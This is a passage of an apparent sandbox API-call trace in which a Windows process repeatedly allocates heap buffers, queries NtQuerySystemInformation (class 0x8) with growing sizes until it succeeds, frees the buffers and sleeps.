(HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.377] Sleep (dwMilliseconds=0x110) [0289.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0289.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0289.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0289.396] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0289.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0289.396] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0289.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0289.397] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0289.400] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.401] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.401] Sleep (dwMilliseconds=0x110) [0289.444] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0289.444] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.445] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0289.463] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0289.463] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.464] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0289.464] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0289.464] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.465] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0289.465] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0289.465] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.465] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0289.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.467] Sleep (dwMilliseconds=0x110) [0289.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0289.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0289.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0289.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0289.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0289.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0289.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0289.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0289.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.503] Sleep (dwMilliseconds=0x110) [0289.524] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0289.525] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0289.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0289.525] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.526] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0289.526] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0289.526] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.527] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0289.527] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0289.527] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.527] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0289.527] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.528] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.529] Sleep (dwMilliseconds=0x110) [0289.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0289.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0289.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0289.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0289.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0289.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0289.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0289.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.586] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0289.586] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.586] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.586] Sleep (dwMilliseconds=0x110) [0289.617] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0289.617] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.618] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0289.618] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0289.618] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.619] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0289.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0289.619] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.619] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0289.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0289.619] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.620] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0289.620] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.620] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.620] Sleep (dwMilliseconds=0x110) [0289.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0289.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0289.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0289.631] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0289.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0289.632] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.633] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0289.633] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0289.633] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.634] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0289.634] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.634] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.634] Sleep (dwMilliseconds=0x110) [0289.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0289.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0289.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0289.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0289.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0289.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0289.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0289.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0289.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.648] Sleep (dwMilliseconds=0x110) [0289.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0289.668] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0289.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0289.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0289.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0289.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0289.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0289.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0289.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.673] Sleep (dwMilliseconds=0x110) [0289.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0289.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0289.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0289.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0289.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0289.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0289.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0289.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0289.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.694] Sleep (dwMilliseconds=0x110) [0289.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0289.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0289.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0289.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0289.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0289.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0289.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0289.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0289.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.721] Sleep (dwMilliseconds=0x110) [0289.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0289.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0289.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0289.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0289.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0289.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0289.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0289.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0289.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.737] Sleep (dwMilliseconds=0x110) [0289.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0289.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0289.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0289.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0289.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0289.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0289.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0289.755] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.760] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0289.760] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.760] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.760] Sleep (dwMilliseconds=0x110) [0289.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0289.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0289.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0289.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0289.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0289.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0289.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0289.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: 